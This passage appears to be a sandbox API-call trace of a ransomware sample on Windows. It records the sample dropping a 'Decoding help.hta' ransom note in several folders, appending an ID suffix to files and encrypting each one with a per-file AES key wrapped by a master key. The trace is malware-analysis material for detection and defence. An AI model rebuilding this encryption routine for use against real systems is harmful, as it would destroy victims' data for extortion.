(lpString="\\\\?\\C:\\Users\\Public\\Desktop\\*.*") returned 31 [0040.494] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Desktop\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Public\\Desktop\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Public\\Desktop\\Decoding help.hta" [0040.494] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Decoding help.hta" (normalized: "c:\\users\\public\\desktop\\decoding help.hta")) returned 0xffffffff [0040.495] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Decoding help.hta" (normalized: "c:\\users\\public\\desktop\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0040.785] WriteFile (in: hFile=0x328, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xfecfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xfecfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0040.786] CloseHandle (hObject=0x328) returned 1 [0040.786] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.210] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Adobe Reader X.lnk") returned 1 [0041.210] lstrlenW (lpString="Adobe Reader X.lnk") returned 18 [0041.210] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\Public\\Desktop\\*.*" [0041.210] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Desktop\\*.*") returned 31 [0041.210] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Desktop\\", lpString2="Adobe Reader X.lnk" | out: lpString1="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk") returned="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk" [0041.210] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk" | out: lpString1="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk") returned="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk" [0041.210] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk.[ID]g9uZrLhJaygpwRm1[ID]" [0041.210] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk" (normalized: "c:\\users\\public\\desktop\\adobe reader x.lnk"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\public\\desktop\\adobe reader x.lnk.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.212] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\public\\desktop\\adobe reader x.lnk.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0041.212] CreateFileMappingA (hFile=0x3f8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3fc [0041.212] CryptAcquireContextA (in: phProv=0xfecfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xfecfcec*=0x3449468) returned 1 [0043.830] CryptGenKey (in: hProv=0x3449468, Algid=0x6610, dwFlags=0x1, phKey=0xfecfce8 | out: phKey=0xfecfce8*=0x5d86d0) returned 1 [0043.830] CryptExportKey (in: hKey=0x5d86d0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xfecfbe4, pdwDataLen=0xfecfce4 | out: pbData=0xfecfbe4*, pdwDataLen=0xfecfce4*=0x2c) returned 1 [0043.830] MapViewOfFile (hFileMappingObject=0x3fc, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e0) returned 0x4450000 [0044.101] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfecfbe4*, pdwDataLen=0xfecfcf8*=0x40, dwBufLen=0x100 | out: pbData=0xfecfbe4*, pdwDataLen=0xfecfcf8*=0x100) returned 1 [0047.022] CryptEncrypt (in: hKey=0x5d86d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4450000*, pdwDataLen=0xfecfce4*=0x7e0, dwBufLen=0x7e0 | out: pbData=0x4450000*, pdwDataLen=0xfecfce4*=0x7e0) returned 1 [0047.022] UnmapViewOfFile (lpBaseAddress=0x4450000) returned 1 [0047.023] CloseHandle (hObject=0x3fc) returned 1 [0047.023] CryptDestroyKey (hKey=0x5d86d0) returned 1 [0047.023] CryptReleaseContext (hProv=0x3449468, dwFlags=0x0) returned 1 [0047.023] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0047.023] WriteFile (in: hFile=0x3f8, lpBuffer=0xfecfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xfecfcf8, lpOverlapped=0x0 | out: lpBuffer=0xfecfbe4*, lpNumberOfBytesWritten=0xfecfcf8*=0x100, lpOverlapped=0x0) returned 1 [0050.361] WriteFile (in: hFile=0x3f8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xfecfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xfecfcf8*=0x500, lpOverlapped=0x0) returned 1 [0050.361] CloseHandle (hObject=0x3f8) returned 1 [0050.365] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0053.677] FindNextFileW (in: hFindFile=0x5a5df0, lpFindFileData=0xfecfd30 | out: lpFindFileData=0xfecfd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2826d6cd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2826d6cd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28860dd8, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0053.678] lstrcpyW (in: lpString1=0x2a740278, lpString2="\\\\?\\C:\\Users\\Public\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\Public\\Desktop\\*.*" [0053.678] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Desktop\\*.*") returned 31 [0053.678] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Desktop\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Public\\Desktop\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Public\\Desktop\\Decoding help.hta" [0053.678] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Decoding help.hta" (normalized: "c:\\users\\public\\desktop\\decoding help.hta")) returned 0x1 [0053.678] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0053.678] lstrlenW (lpString="desktop.ini") returned 11 [0053.678] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\Desktop\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\Public\\Desktop\\*.*" [0053.678] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Desktop\\*.*") returned 31 [0053.678] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Desktop\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini") returned="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini" [0053.678] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini") returned="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini" [0053.678] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0053.678] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini" (normalized: "c:\\users\\public\\desktop\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\public\\desktop\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.203] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\public\\desktop\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x700 [0058.203] CreateFileMappingA (hFile=0x700, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x418 [0058.203] CryptAcquireContextA (in: phProv=0xfecfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xfecfcec*=0x3449468) returned 1 [0060.182] CryptGenKey (in: hProv=0x3449468, Algid=0x6610, dwFlags=0x1, phKey=0xfecfce8 | out: phKey=0xfecfce8*=0x42cf298) returned 1 [0060.182] CryptExportKey (in: hKey=0x42cf298, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xfecfbe4, pdwDataLen=0xfecfce4 | out: pbData=0xfecfbe4*, pdwDataLen=0xfecfce4*=0x2c) returned 1 [0060.182] MapViewOfFile (hFileMappingObject=0x418, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa0) returned 0x3a70000 [0063.815] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfecfbe4*, pdwDataLen=0xfecfcf8*=0x40, dwBufLen=0x100 | out: pbData=0xfecfbe4*, pdwDataLen=0xfecfcf8*=0x100) returned 1 [0063.815] CryptEncrypt (in: hKey=0x42cf298, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3a70000*, pdwDataLen=0xfecfce4*=0xa0, dwBufLen=0xa0 | out: pbData=0x3a70000*, pdwDataLen=0xfecfce4*=0xa0) returned 1 [0063.816] UnmapViewOfFile (lpBaseAddress=0x3a70000) Thread: id = 208 os_tid = 0x834 [0040.496] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\*.*", lpFindFileData=0x6ecfd30 | out: lpFindFileData=0x6ecfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1120b5b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1120b5b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1120b5b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8010 [0040.788] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.788] FindNextFileW (in: hFindFile=0x5d8010, lpFindFileData=0x6ecfd30 | out: lpFindFileData=0x6ecfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1120b5b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1120b5b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1120b5b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.788] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.788] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.788] FindNextFileW (in: hFindFile=0x5d8010, lpFindFileData=0x6ecfd30 | out: lpFindFileData=0x6ecfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1120b5b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x527793d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x527793d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bin", cAlternateFileName="")) returned 1 [0040.788] lstrcmpW (lpString1=".", lpString2="Bin") returned -1 [0040.788] lstrcmpW (lpString1="..", lpString2="Bin") returned -1 [0040.788] lstrcmpiW (lpString1="windows", lpString2="Bin") returned 1 [0041.224] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\*.*" [0041.224] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\*.*") returned 61 [0041.224] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\", lpString2="Bin" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin" [0041.224] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\*.*" [0041.224] GlobalMemoryStatus (in: lpBuffer=0x6ecfd10 | out: lpBuffer=0x6ecfd10) [0041.224] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x113944a8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2a0 [0041.233] CloseHandle (hObject=0x2a0) returned 1 [0041.233] FindNextFileW (in: hFindFile=0x5d8010, lpFindFileData=0x6ecfd30 | out: lpFindFileData=0x6ecfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1120b5b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x527793d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x527793d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bin", cAlternateFileName="")) returned 0 [0041.233] FindClose (in: hFindFile=0x5d8010 | out: hFindFile=0x5d8010) returned 1 Thread: id = 209 os_tid = 0x830 [0040.496] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*.*", lpFindFileData=0x1000fd30 | out: lpFindFileData=0x1000fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d88d0 [0042.049] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.049] FindNextFileW (in: hFindFile=0x5d88d0, lpFindFileData=0x1000fd30 | out: lpFindFileData=0x1000fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.049] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.049] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.049] FindNextFileW (in: hFindFile=0x5d88d0, lpFindFileData=0x1000fd30 | out: lpFindFileData=0x1000fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd591378b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd591378b, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6ac29de1, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3d00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ppcrlconfig.dll", cAlternateFileName="PPCRLC~1.DLL")) returned 1 [0042.049] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*.*" [0042.049] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*.*") returned 44 [0042.049] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\Decoding help.hta" [0042.049] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\identitycrl\\decoding help.hta")) returned 0xffffffff [0042.050] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\identitycrl\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x504 [0042.050] WriteFile (in: hFile=0x504, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1000fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1000fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.051] CloseHandle (hObject=0x504) returned 1 [0042.051] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.051] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ppcrlconfig.dll") returned -1 [0042.051] lstrlenW (lpString="ppcrlconfig.dll") returned 15 [0042.051] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*.*" [0042.051] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*.*") returned 44 [0042.051] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\", lpString2="ppcrlconfig.dll" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll") returned="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll" [0042.051] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll") returned="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll" [0042.051] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0042.051] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlconfig.dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlconfig.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.255] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlconfig.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x570 [0042.256] CreateFileMappingA (hFile=0x570, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x588 [0042.256] CryptAcquireContextA (in: phProv=0x1000fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1000fcec*=0x245f11b0) returned 1 [0048.433] CryptGenKey (in: hProv=0x245f11b0, Algid=0x6610, dwFlags=0x1, phKey=0x1000fce8 | out: phKey=0x1000fce8*=0x5db378) returned 1 [0048.434] CryptExportKey (in: hKey=0x5db378, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1000fbe4, pdwDataLen=0x1000fce4 | out: pbData=0x1000fbe4*, pdwDataLen=0x1000fce4*=0x2c) returned 1 [0048.434] MapViewOfFile (hFileMappingObject=0x588, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3d00) returned 0x530000 [0048.448] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1000fbe4*, pdwDataLen=0x1000fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1000fbe4*, pdwDataLen=0x1000fcf8*=0x100) returned 1 [0048.448] CryptEncrypt (in: hKey=0x5db378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x530000, pdwDataLen=0x1000fce4*=0x3d00, dwBufLen=0x3d00 | out: pbData=0x530000*, pdwDataLen=0x1000fce4*=0x3d00) returned 1 [0048.449] UnmapViewOfFile (lpBaseAddress=0x530000) returned 1 [0048.450] CloseHandle (hObject=0x588) returned 1 [0048.450] CryptDestroyKey (hKey=0x5db378) returned 1 [0048.450] CryptReleaseContext (hProv=0x245f11b0, dwFlags=0x0) returned 1 [0048.450] SetFilePointerEx (in: hFile=0x570, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0048.450] WriteFile (in: hFile=0x570, lpBuffer=0x1000fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1000fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1000fbe4*, lpNumberOfBytesWritten=0x1000fcf8*=0x100, lpOverlapped=0x0) returned 1 [0050.381] WriteFile (in: hFile=0x570, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1000fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1000fcf8*=0x500, lpOverlapped=0x0) returned 1 [0051.065] CloseHandle (hObject=0x570) returned 1 [0051.672] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0055.297] FindNextFileW (in: hFindFile=0x5d88d0, lpFindFileData=0x1000fd30 | out: lpFindFileData=0x1000fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd582ef5d, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd582ef5d, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6ac4ff3f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3e108, dwReserved0=0x0, dwReserved1=0x0, cFileName="ppcrlui.dll", cAlternateFileName="")) returned 1 [0055.297] lstrcpyW (in: lpString1=0x10fcf5c8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*.*" [0055.297] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*.*") returned 44 [0055.297] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\Decoding help.hta" [0055.297] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\identitycrl\\decoding help.hta")) returned 0x1 [0055.297] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ppcrlui.dll") returned -1 [0055.298] lstrlenW (lpString="ppcrlui.dll") returned 11 [0055.298] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*.*" [0055.298] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*.*") returned 44 [0055.298] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\", lpString2="ppcrlui.dll" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll") returned="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll" [0055.298] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll") returned="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll" [0055.298] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: 